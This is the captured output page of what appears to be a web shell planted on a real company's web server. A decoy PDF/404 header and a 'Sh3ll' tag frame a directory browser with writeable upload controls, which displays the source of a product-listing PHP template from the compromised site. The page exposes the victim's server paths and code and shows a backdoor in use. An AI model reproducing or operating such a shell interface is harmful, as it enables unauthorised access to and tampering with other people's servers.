%PDF-1.4 404 Not Found
Sh3ll



Directory :  /var/www/vhosts/lautnusantara.com/httpdocs/web/app/Views/theme/spirit/module/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

Current File : /var/www/vhosts/lautnusantara.com/httpdocs/web/app/Views/theme/spirit/module/mod_service.php
<?php
$dt_service = $Produk_Model->get_data_produk(false, false, false, 3)->get()->getResultArray();
?>
<section id="service_part">
    <div class="container">
        <div class="row">
            <div class="col-sm-12 text-center">
                <div class="section_head service_head">
                    <h2 style="text-transform: none;">
                        Products
                        <?= '' //$dt_service[0]['categori_name'] ?>
                    </h2>
                    <!--<p><?= ''; // $dt_service[0]['cat_desc'] ?></p> -->
                </div>
            </div>
            <div class="clearfix"></div>
            <div class="service_bottom text-center">
                <div class="blog_content_part">

                    <?php
                    foreach ($dt_service as $data):
                        ?>
                    <div class="col-md-4 col-sm-6 col-xs-12">
                        <div class="service_item" style="min-height: 435px;">
                            <!--<i class="<?= ''; //$data['icon'] ?>"></i>-->
                            <?php if ($data['url_image'] == '') { ?>
                            <img id="output_image" alt="100%x140" style="padding: 10px; display: block;" width=" 100%"
                                src="data:image/svg+xml;base64,PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiIHN0YW5kYWxvbmU9InllcyI/PjxzdmcgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB3aWR0aD0iMjQ4IiBoZWlnaHQ9IjE0MCIgdmlld0JveD0iMCAwIDI0OCAxNDAiIHByZXNlcnZlQXNwZWN0UmF0aW89Im5vbmUiPjxkZWZzLz48cmVjdCB3aWR0aD0iMjQ4IiBoZWlnaHQ9IjE0MCIgZmlsbD0iI0VFRUVFRSIvPjxnPjx0ZXh0IHg9IjkxLjg0OTk5ODQ3NDEyMTEiIHk9IjcwIiBzdHlsZT0iZmlsbDojQUFBQUFBO2ZvbnQtd2VpZ2h0OmJvbGQ7Zm9udC1mYW1pbHk6QXJpYWwsIEhlbHZldGljYSwgT3BlbiBTYW5zLCBzYW5zLXNlcmlmLCBtb25vc3BhY2U7Zm9udC1zaXplOjEycHQ7ZG9taW5hbnQtYmFzZWxpbmU6Y2VudHJhbCI+MjQ4eDE0MDwvdGV4dD48L2c+PC9zdmc+"
                                data-holder-rendered="true">
                            <?php } else { ?>
                            <a href="<?= '/detail/produk/' . $data['id'] . '/' . $data['alias'] ?>" rel="nofollow"
                                aria-label="Products">
                                <img src="<?= $data['url_image'] ?>" alt="img" width="100%">
                            </a>
                            <?php } ?>

                            <a href="<?= '/detail/produk/' . $data['id'] . '/' . $data['alias'] ?>" rel="nofollow"
                                aria-label="Products">
                                <h3>
                                    <?= $data['title'] ?>
                                </h3>
                            </a>
                            <p><span>
                                    <?= $data['introtext'] ?>
                            </p>
                            <a href="<?= '/detail/produk/' . $data['id'] . '/' . $data['alias'] ?>" class="ser_btn"
                                rel="nofollow" aria-label="Read more our products">Read
                                More <i class="fa fa-arrow-right"></i></a>
                        </div>
                    </div>
                    <?php
                    endforeach;
                    ?>
                </div>
                <div style="text-align:center">
                    <div class="blog_des">
                        <input type='hidden' name='artikel_id' value=''>
                        <a href="<?= '/daftar/produk/' ?>" class="blog_Read" rel="nofollow"
                            aria-label="Other Products">More Product<i class="fa fa-arrow-right"></i></a>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>

WonXd677 Sh3LL